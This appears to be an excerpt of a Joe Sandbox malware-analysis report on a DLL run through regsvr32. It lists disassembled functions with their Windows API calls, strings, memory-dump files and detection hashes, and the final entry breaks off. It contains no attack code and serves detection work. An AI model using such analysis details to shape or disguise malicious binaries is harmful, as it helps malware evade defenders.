Part of subcall function 1003065C: GetModuleHandleW.KERNEL32(00000000,?,10034573,KERNEL32.DLL,?,?,10034907,00000000,?,1002E9AC,00000000,?,?,?,1002EA0F,?), ref: 10030671

GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 10034656
GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 10034666
__lock.LIBCMT ref: 10034688
InterlockedIncrement.KERNEL32(?), ref: 10034695
__lock.LIBCMT ref: 100346A9
___addlocaleref.LIBCMT ref: 100346C7

Strings

DecodePointer, xrefs: 1003465E
KERNEL32.DLL, xrefs: 1003461C, 10034621, 1003462C
EncodePointer, xrefs: 1003464A

Memory Dump Source

Source File: 00000003.00000002.421661610.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421651971.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421718226.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421730767.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421737622.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.421767005.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421773955.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421780577.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
String ID: DecodePointer$EncodePointer$KERNEL32.DLL
API String ID: 1028249917-2843748187
Opcode ID: 5b83938148a6bc88c1e014cfaa9ba3fc415054042f6b227dce2f604cd513625e
Instruction ID: 0d6301bb9ab871ffe84231295dfe76788f8a31cd98ef4b571f500b89faff28c9
Opcode Fuzzy Hash: 5b83938148a6bc88c1e014cfaa9ba3fc415054042f6b227dce2f604cd513625e
Instruction Fuzzy Hash: 1C11AF79801741AFE711CF79CD42B8ABBF0EF45311F214969E499EB2A0CB74AA40CB59

Uniqueness

Uniqueness Score: -1.00%

Function 1002341C, Relevance: 16.6, APIs: 11, Instructions: 139COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 10023423
FindResourceA.KERNEL32(?,?,00000005), ref: 10023456
LoadResource.KERNEL32(?,00000000), ref: 1002345E

Part of subcall function 100275EC: UnhookWindowsHookEx.USER32(?), ref: 1002761C

LockResource.KERNEL32(?,00000024,1000150C,00000000,057BE668), ref: 1002346F
GetDesktopWindow.USER32 ref: 100234A2
IsWindowEnabled.USER32(?), ref: 100234B0
EnableWindow.USER32(?,00000000), ref: 100234BF

Part of subcall function 1002A492: IsWindowEnabled.USER32(?), ref: 1002A49B

Part of subcall function 1002A4AD: EnableWindow.USER32(?,00000000), ref: 1002A4BE

EnableWindow.USER32(?,00000001), ref: 100235A4
GetActiveWindow.USER32 ref: 100235AF
SetActiveWindow.USER32(?,?,00000024,1000150C,00000000,057BE668), ref: 100235BD
FreeResource.KERNEL32(?,?,00000024,1000150C,00000000,057BE668), ref: 100235D9

Memory Dump Source

Source File: 00000003.00000002.421661610.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421651971.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421718226.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421730767.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421737622.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.421767005.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421773955.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421780577.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$Resource$Enable$ActiveEnabled$DesktopFindFreeH_prolog3_catchHookLoadLockUnhookWindows
String ID:
API String ID: 964565984-0
Opcode ID: 9f51e5419fd464f8870fff1869e5699930f25b995303faded1736d57e07594c8
Instruction ID: c961092801c59ee9409441e3dbe49a4a333b051d42b2e552560430daa244bbc0
Opcode Fuzzy Hash: 9f51e5419fd464f8870fff1869e5699930f25b995303faded1736d57e07594c8
Instruction Fuzzy Hash: AA51A034A00B15DFDF11DFA4E9856AEBBF0FF48711F904029E54AA21A1CB719E81CF55

Uniqueness

Uniqueness Score: -1.00%

Function 1001E790, Relevance: 13.6, APIs: 9, Instructions: 105windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32 ref: 1001E7D5
SendMessageA.USER32 ref: 1001E7FB
SendMessageA.USER32 ref: 1001E815
SendMessageA.USER32 ref: 1001E839
SendMessageA.USER32 ref: 1001E86E
SendMessageA.USER32 ref: 1001E888
SendMessageA.USER32 ref: 1001E8A4
SendMessageA.USER32 ref: 1001E8BD
SendMessageA.USER32 ref: 1001E8DB

Part of subcall function 1001E520: _strlen.LIBCMT ref: 1001E5FA
Part of subcall function 1001E520: _strlen.LIBCMT ref: 1001E614

Memory Dump Source

Source File: 00000003.00000002.421661610.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421651971.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421718226.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421730767.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421737622.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.421767005.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421773955.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421780577.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: MessageSend$_strlen
String ID:
API String ID: 3697954797-0
Opcode ID: 50909218d121ae73ae8b47ddfd2900abd0d565cb3fc4bb7cb040f620d48819e1
Instruction ID: 0edfc11e8551d9ebf0957f65f3a3322fb23760369c1f09792b2f79df2d73aaf8
Opcode Fuzzy Hash: 50909218d121ae73ae8b47ddfd2900abd0d565cb3fc4bb7cb040f620d48819e1
Instruction Fuzzy Hash: 22413A74F00306ABE704CF94CD85FAEB7B5FB88B41F208159FA19AB291C670A941DB54

Uniqueness

Uniqueness Score: -1.00%

Function 1002102D, Relevance: 12.1, APIs: 8, Instructions: 66memorystringCOMMON

Download Yara Rule

APIs

GlobalLock.KERNEL32 ref: 1002104C
lstrcmpA.KERNEL32(?,?), ref: 10021058
OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 1002106A
DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 1002108A
GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 10021092
GlobalLock.KERNEL32 ref: 1002109C
DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 100210A9
ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 100210C1

Part of subcall function 1002A801: GlobalFlags.KERNEL32(?), ref: 1002A810
Part of subcall function 1002A801: GlobalUnlock.KERNEL32(?,?,?,?,10021A27,?,00000214,1000148F), ref: 1002A822
Part of subcall function 1002A801: GlobalFree.KERNEL32 ref: 1002A82D

Memory Dump Source

Source File: 00000003.00000002.421661610.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421651971.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421718226.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421730767.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421737622.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.421767005.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421773955.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421780577.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
String ID:
API String ID: 168474834-0
Opcode ID: 85f582fc0fa2d760b393ed167a5d421003042f2adcf672044b7dbfb8b9eda5cc
Instruction ID: 1e26f6493bbdf61cc617228eadb58d3a13350607a0778397bdab265459f41c03
Opcode Fuzzy Hash: 85f582fc0fa2d760b393ed167a5d421003042f2adcf672044b7dbfb8b9eda5cc
Instruction Fuzzy Hash: 6E11E079600640BBDB228BA5CD89DAFBAFDFB867407500529F605D2020DA72ED81DB64

Uniqueness

Uniqueness Score: -1.00%

Function 100270BC, Relevance: 10.6, APIs: 7, Instructions: 117windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 100270EF
PeekMessageA.USER32 ref: 10027113
UpdateWindow.USER32(?), ref: 1002712E
SendMessageA.USER32 ref: 1002714F
SendMessageA.USER32 ref: 10027167
UpdateWindow.USER32(?), ref: 100271AA
PeekMessageA.USER32 ref: 100271DB

Part of subcall function 1002A3F0: GetWindowLongA.USER32 ref: 1002A3FB

Memory Dump Source

Source File: 00000003.00000002.421661610.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421651971.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421718226.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421730767.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421737622.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.421767005.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421773955.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421780577.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Message$Window$PeekSendUpdate$LongParent
String ID:
API String ID: 2853195852-0
Opcode ID: 5e6b9223f0a1804046a8fbfe378e80d9714a9eacbb44f0fef3914e7058a9bdf9
Instruction ID: e439185c47b7e5e34c348b8e0b3dbe5bb3c4b57b45cec7e657144295835a6737
Opcode Fuzzy Hash: 5e6b9223f0a1804046a8fbfe378e80d9714a9eacbb44f0fef3914e7058a9bdf9
Instruction Fuzzy Hash: 9041C370E00246EBDB11CF69DC84E9FBBF8FF82B81F90815DE949A2150D7719A50DB10

Uniqueness

Uniqueness Score: -1.00%

Function 10027676, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 104windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 10027705
SendMessageA.USER32 ref: 1002772E
GetWindowLongA.USER32 ref: 10027740
GetWindowLongA.USER32 ref: 10027751
SetWindowLongA.USER32(?,000000FC,?), ref: 1002776D

Strings

,, xrefs: 10027724

Memory Dump Source

Source File: 00000003.00000002.421661610.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421651971.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421718226.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421730767.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421737622.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.421767005.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421773955.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421780577.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: LongWindow$MessageSend_memset
String ID: ,
API String ID: 2997958587-3772416878
Opcode ID: 1276ef7f4d5813a713450155f5ae2d4635a7a3024c65db1a6c5f2f6a990dd864
Instruction ID: f848ae84a4977e1a31b52bc52376e27e10e8709ed1b3efe9ee7841c93cdd6a05
Opcode Fuzzy Hash: 1276ef7f4d5813a713450155f5ae2d4635a7a3024c65db1a6c5f2f6a990dd864
Instruction Fuzzy Hash: 1431C134600B119FC715DF78E888A6AB7F5FF48350B92056DE58997691DB70E800CF94

Uniqueness

Uniqueness Score: -1.00%

Function 1002245E, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 101registryCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 10022468
RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 1002254E
RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 1002256B
RegCloseKey.ADVAPI32(?), ref: 1002258B
RegQueryValueA.ADVAPI32(80000001,?,?,?), ref: 100225A6

Strings

Software\, xrefs: 100224CC

Memory Dump Source

Source File: 00000003.00000002.421661610.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421651971.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421718226.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421730767.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421737622.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.421767005.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421773955.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421780577.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: CloseEnumH_prolog3_OpenQueryValue
String ID: Software\
API String ID: 1666054129-964853688
Opcode ID: 3dcc581e61560c1b2a89a559af4b2aadf043690cbf44cd43855230fa8fe55520
Instruction ID: 3764a028f082780bf1b34d3e1a3aecc110f1b9c57831791e493d608046546682
Opcode Fuzzy Hash: 3dcc581e61560c1b2a89a559af4b2aadf043690cbf44cd43855230fa8fe55520
Instruction Fuzzy Hash: 3C41AC35800128EBCB22DBA0CC81AEEB3B8FF49310F5045D9F249E2191DB34AB958F94

Uniqueness

Uniqueness Score: -1.00%

Function 100222E0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 86registryCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 100222EA
RegOpenKeyA.ADVAPI32(?,?,?), ref: 10022378
RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 1002239B

Part of subcall function 1002228B: __EH_prolog3.LIBCMT ref: 10022292

Strings

Software\Classes\, xrefs: 1002232B

Memory Dump Source

Source File: 00000003.00000002.421661610.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421651971.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421718226.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421730767.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421737622.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.421767005.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421773955.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421780577.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: EnumH_prolog3H_prolog3_catch_Open
String ID: Software\Classes\
API String ID: 3518408925-1121929649
Opcode ID: 148a9a07ce493e8523daa3725bf67091589f603dbf0392a59fe7285a5da600ad
Instruction ID: 704202dc6e21b2fa8b48efa6eea704b7fc6a1643c8ca87a9ade3220d51c06aab
Opcode Fuzzy Hash: 148a9a07ce493e8523daa3725bf67091589f603dbf0392a59fe7285a5da600ad
Instruction Fuzzy Hash: A1317C36C00068EBDB22EBA4CD44BDDB6B8FB09350F5141D5F999A3252DA306FA49F91

Uniqueness

Uniqueness Score: -1.00%

Function 1002B26C, Relevance: 10.6, APIs: 7, Instructions: 70windowCOMMON

Download Yara Rule

APIs

GetCapture.USER32 ref: 1002B279
SendMessageA.USER32 ref: 1002B294
GetFocus.USER32 ref: 1002B2A9
SendMessageA.USER32 ref: 1002B2B7
GetLastActivePopup.USER32(?), ref: 1002B2E0
SendMessageA.USER32 ref: 1002B2ED

Part of subcall function 1002881E: GetWindowLongA.USER32 ref: 10028844
Part of subcall function 1002881E: GetParent.USER32(?), ref: 10028852

SendMessageA.USER32 ref: 1002B313

Memory Dump Source

Source File: 00000003.00000002.421661610.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421651971.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421718226.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421730767.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421737622.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.421767005.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421773955.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421780577.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: MessageSend$ActiveCaptureFocusLastLongParentPopupWindow
String ID:
API String ID: 3338174999-0
Opcode ID: 8b045ddbd33b9174f1829eda3b456e63d99d5e6e5f6e5226114c782d6a6a23be
Instruction ID: 3a08670cfc868389e080b955865bcb0f045f405a5b874c30a2897e43bb08e3ed
Opcode Fuzzy Hash: 8b045ddbd33b9174f1829eda3b456e63d99d5e6e5f6e5226114c782d6a6a23be
Instruction Fuzzy Hash: 7F1146B590065AFFEB11DFA1DD8AC9E7E7CEF41788B910075F504A2121EB719F04AB20

Uniqueness

Uniqueness Score: -1.00%

Function 1002B00C, Relevance: 10.6, APIs: 7, Instructions: 51memoryCOMMON

Download Yara Rule

APIs

LeaveCriticalSection.KERNEL32(?), ref: 1002B013
__CxxThrowException@8.LIBCMT ref: 1002B01D

Part of subcall function 100312CD: RaiseException.KERNEL32(?,?,1004B6B4,1004F1B8,?,?,?,100203CA,1004B6B4,1004F1B8,00000000,00000000), ref: 1003130F

LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004), ref: 1002B034
LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004,10001461,00000000), ref: 1002B041

Part of subcall function 10023B23: __CxxThrowException@8.LIBCMT ref: 10023B39

_memset.LIBCMT ref: 1002B060
TlsSetValue.KERNEL32(?,00000000), ref: 1002B071
LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004,10001461,00000000), ref: 1002B092

Memory Dump Source

Source File: 00000003.00000002.421661610.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421651971.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421718226.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421730767.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421737622.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.421767005.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421773955.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421780577.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: CriticalLeaveSection$Exception@8Throw$AllocExceptionLocalRaiseValue_memset
String ID:
API String ID: 356813703-0
Opcode ID: 57ffba166e203e5f771fa8df9200c34d4f09cabdb1cbb7fcc74f3b72e3f2cbe0
Instruction ID: 36d3102e2cb30bc4552268f57227952f3745dc8c02fd82b3b9104c669509b869
Opcode Fuzzy Hash: 57ffba166e203e5f771fa8df9200c34d4f09cabdb1cbb7fcc74f3b72e3f2cbe0
Instruction Fuzzy Hash: DC115E74100605AFD725EF64DCC5D2BBBB9FF453107A0C529F969D6522CB30AC24CB94

Uniqueness

Uniqueness Score: -1.00%

Function 10023266, Relevance: 9.1, APIs: 6, Instructions: 136COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 1002326D
GlobalLock.KERNEL32 ref: 10023345
CreateDialogIndirectParamA.USER32(?,?,?,10022CA4,00000000), ref: 10023374
DestroyWindow.USER32(00000000,?,1000150C,00000000,057BE668), ref: 100233EE
GlobalUnlock.KERNEL32(?,?,1000150C,00000000,057BE668), ref: 100233FE
GlobalFree.KERNEL32 ref: 10023407

Memory Dump Source

Source File: 00000003.00000002.421661610.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421651971.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421718226.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421730767.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421737622.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.421767005.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421773955.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421780577.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Global$CreateDestroyDialogFreeH_prolog3_catchIndirectLockParamUnlockWindow
String ID:
API String ID: 3003189058-0
Opcode ID: 888fa3cfcf776247989f330621f25040a0e9d6be9df16a9d0be9406a16dfc2c2
Instruction ID: 542586d5134ef99c8f61472b69a72313b72e87743f096b2e8f632b75dff3f323
Opcode Fuzzy Hash: 888fa3cfcf776247989f330621f25040a0e9d6be9df16a9d0be9406a16dfc2c2
Instruction Fuzzy Hash: DD519B31A0024AEFCB04DFA4E9859AEBBB5EF04350F95442DF506E7292CB70AA45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 10037738, Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

__CreateFrameInfo.LIBCMT ref: 10037760

Part of subcall function 10030430: __getptd.LIBCMT ref: 1003043E
Part of subcall function 10030430: __getptd.LIBCMT ref: 1003044C

__getptd.LIBCMT ref: 1003776A

Part of subcall function 10034770: __getptd_noexit.LIBCMT ref: 10034773
Part of subcall function 10034770: __amsg_exit.LIBCMT ref: 10034780

__getptd.LIBCMT ref: 10037778
__getptd.LIBCMT ref: 10037786
__getptd.LIBCMT ref: 10037791
_CallCatchBlock2.LIBCMT ref: 100377B7

Part of subcall function 100304D5: __CallSettingFrame@12.LIBCMT ref: 10030521

Part of subcall function 1003785E: __getptd.LIBCMT ref: 1003786D
Part of subcall function 1003785E: __getptd.LIBCMT ref: 1003787B

Memory Dump Source

Source File: 00000003.00000002.421661610.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421651971.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421718226.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421730767.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421737622.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.421767005.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421773955.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421780577.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
String ID:
API String ID: 1602911419-0
Opcode ID: 46636e942f87dcca0c30cf7feca0092d3b0ea187b49415045ba274b669f62aa0
Instruction ID: fb1f34f9027f5a0fd6fb665b034cbc12c1ee6665b85233a2d450c333db5c1a8f
Opcode Fuzzy Hash: 46636e942f87dcca0c30cf7feca0092d3b0ea187b49415045ba274b669f62aa0
Instruction Fuzzy Hash: 4F1104B9C04249EFDB01DFA4D945AEE7BB1FF08315F508469F814AB251DB38AA11DF90

Uniqueness

Uniqueness Score: -1.00%

Function 10025110, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 65COMMON

Download Yara Rule

APIs

SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 10025150
GetSystemMetrics.USER32 ref: 10025168
GetSystemMetrics.USER32 ref: 1002516F

Strings

B, xrefs: 1002512F
DISPLAY, xrefs: 1002518C

Memory Dump Source

Source File: 00000003.00000002.421661610.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421651971.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421718226.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421730767.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421737622.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.421767005.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421773955.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421780577.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: System$Metrics$InfoParameters
String ID: B$DISPLAY
API String ID: 3136151823-3316187204
Opcode ID: b6b25803d1236a503b5fcdcee7e41ccf2bd8b680c30ee70901717e7f43f6efc3
Instruction ID: b60a64a5d5410e3ad8fe5a59109b18ab5d44eebb328e5d1eff8611f1e2dd37b9
Opcode Fuzzy Hash: b6b25803d1236a503b5fcdcee7e41ccf2bd8b680c30ee70901717e7f43f6efc3
Instruction Fuzzy Hash: 4511E771901334AFEB52DF64DC85B9B7BA8EF45791F414061FD0AAE006D672D910CBE4

Uniqueness

Uniqueness Score: -1.00%

Function 10037474, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 1003748E

Part of subcall function 10034770: __getptd_noexit.LIBCMT ref: 10034773
Part of subcall function 10034770: __amsg_exit.LIBCMT ref: 10034780

__getptd.LIBCMT ref: 1003749F
__getptd.LIBCMT ref: 100374AD

Strings

MOC, xrefs: 10037480
csm, xrefs: 10037487

Memory Dump Source

Source File: 00000003.00000002.421661610.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421651971.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421718226.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421730767.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421737622.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.421767005.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421773955.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421780577.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: MOC$csm
API String ID: 803148776-1389381023
Opcode ID: e3b2ebf427159775b670ccfe04d8264cb15add95c28ba503ee76d0db9538cd89
Instruction ID: 4aa484bfd58dbd3435781d5c114dead901570b21edfee72e4775129354a6ca63
Opcode Fuzzy Hash: e3b2ebf427159775b670ccfe04d8264cb15add95c28ba503ee76d0db9538cd89
Instruction Fuzzy Hash: 59E012395142448FC322DA64D046B283AE4FB4A216F5A04A1E54C8F223CB38F8809692

Uniqueness

Uniqueness Score: -1.00%

Function 1002A742, Relevance: 7.6, APIs: 5, Instructions: 54stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?,?,00000000), ref: 1002A76E
_memset.LIBCMT ref: 1002A78B
GetWindowTextA.USER32 ref: 1002A7A5
lstrcmpA.KERNEL32(00000000,?), ref: 1002A7B7
SetWindowTextA.USER32(?,?), ref: 1002A7C3

Part of subcall function 10023B5B: __CxxThrowException@8.LIBCMT ref: 10023B71

Memory Dump Source

Source File: 00000003.00000002.421661610.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421651971.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421718226.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421730767.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421737622.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.421767005.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421773955.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421780577.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: TextWindow$Exception@8Throw_memsetlstrcmplstrlen
String ID:
API String ID: 289641511-0
Opcode ID: eba42bef06e1ea26d0eb59e6d93e6a074b965602a881250286a8b19bcf32aa76
Instruction ID: 26b6340e82542b1e4468bed3117474a07e50960d7f5f1af9f26f2e201bf88dc7
